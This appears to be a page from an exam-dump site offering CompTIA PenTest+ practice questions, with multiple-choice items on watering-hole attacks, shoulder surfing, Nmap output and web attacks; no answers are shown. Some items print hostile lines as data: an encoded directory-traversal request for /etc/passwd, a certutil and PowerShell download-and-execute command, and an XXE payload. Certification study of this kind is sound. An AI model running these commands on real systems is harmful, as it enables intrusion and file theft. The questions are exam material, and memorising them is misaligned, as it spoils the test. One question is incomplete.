Summer Sale Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: buysanta

Exact2Pass Menu

CompTIA PenTest+ Exam

Last Update 10 hours ago Total Questions : 336

The CompTIA PenTest+ Exam content is now fully updated, with all current exam questions added 10 hours ago. Deciding to include PT0-003 practice exam questions in your study plan goes far beyond basic test preparation.

You'll find that our PT0-003 exam questions frequently feature detailed scenarios and practical problem-solving exercises that directly mirror industry challenges. Engaging with these PT0-003 sample sets allows you to effectively manage your time and pace yourself, giving you the ability to finish any CompTIA PenTest+ Exam practice test comfortably within the allotted time.

Question # 71

During a penetration testing exercise, a team decides to use a watering hole strategy. Which of the following is the most effective approach for executing this attack?

A.

Compromise a website frequently visited by the organization ' s employees.

B.

Launch a DDoS attack on the organization ' s website.

C.

Create fake social media profiles to befriend employees.

D.

Send phishing emails to the organization ' s employees.

Question # 72

A penetration tester identifies the URL for an internal administration application while following DevOps team members on their commutes. Which of the following attacks did the penetration tester most likely use?

A.

Shoulder surfing

B.

Dumpster diving

C.

Spear phishing

D.

Tailgating

Question # 73

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Question # 74

A penetration tester modifies a web application’s URL by inserting malformed data into input parameters. The web application returns the error message below:

Internal Server Error

NumberFormatException: For input string ...

Source file: /home/www/htmldoc/app001/140612/main

Which of the following actions will the tester most likely take?

A.

Perform application dynamic testing.

B.

Tamper with the application’s log files.

C.

Force a remote memory overflow.

D.

Exploit SQL injection vulnerabilities.

Question # 75

A penetration tester is trying to get unauthorized access to a web application and executes the following command:

GET /foo/images/file?id=2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

Which of the following web application attacks is the tester performing?

A.

Insecure Direct Object Reference

B.

Cross-Site Request Forgery

C.

Directory Traversal

D.

Local File Inclusion

Question # 76

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

A.

powershell.exe impo C:\tools\foo.ps1

B.

certutil.exe -f https://192.168.0.1/foo.exe bad.exe

C.

powershell.exe -noni -encode IEX.Downloadstring( " http://172.16.0.1/ " )

D.

rundll32.exe c:\path\foo.dll,functName

Question # 77

A penetration tester obtains the following output during an Nmap scan:

PORT STATE SERVICE

135/tcp open msrpc

445/tcp open microsoft-ds

1801/tcp open msmq

2103/tcp open msrpc

3389/tcp open ms-wbt-server

Which of the following should be the next step for the tester?

A.

Search for vulnerabilities on msrpc.

B.

Enumerate shares and search for vulnerabilities on the SMB service.

C.

Execute a brute-force attack against the Remote Desktop Services.

D.

Execute a new Nmap command to search for another port.

Question # 78

Which of the following is the most efficient way to infiltrate a file containing data that could be sensitive?

A.

Use steganography and send the file over FTP

B.

Compress the file and send it using TFTP

C.

Split the file in tiny pieces and send it over dnscat

D.

Encrypt and send the file over HTTPS

Question # 79

A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:

< ?xml version= " 1.0 " ? >

< !DOCTYPE data [ < !ENTITY foo SYSTEM " file:///etc/passwd " > ] >

< test > & foo; < /test >

Which of the following should the tester recommend in the report to best prevent this type of vulnerability?

A.

Drop all excessive file permissions with chmod o-rwx

B.

Ensure the requests application access logs are reviewed frequently

C.

Disable the use of external entities

D.

Implement a WAF to filter all incoming requests

Question # 80

During a security audit, a penetration tester wants to exploit a vulnerability in a common network protocol. The protocol allows encrypted communications to be intercepted and manipulated. Which of the following vulnerabilities should the tester exploit?

A.

CVE-202W-ZZZZ: Cisco ASA IKEv2/IPSec Fragmentation Vulnerability

B.

CVE-202Y-XXXX: Wireshark SSL/TLS Decryption Vulnerability

C.

CVE-202X-YYYY: OpenSSL DROWN Attack

D.

CVE-202Z-WWWW: Microsoft SMBv1 EternalBlue Exploit

Go to page: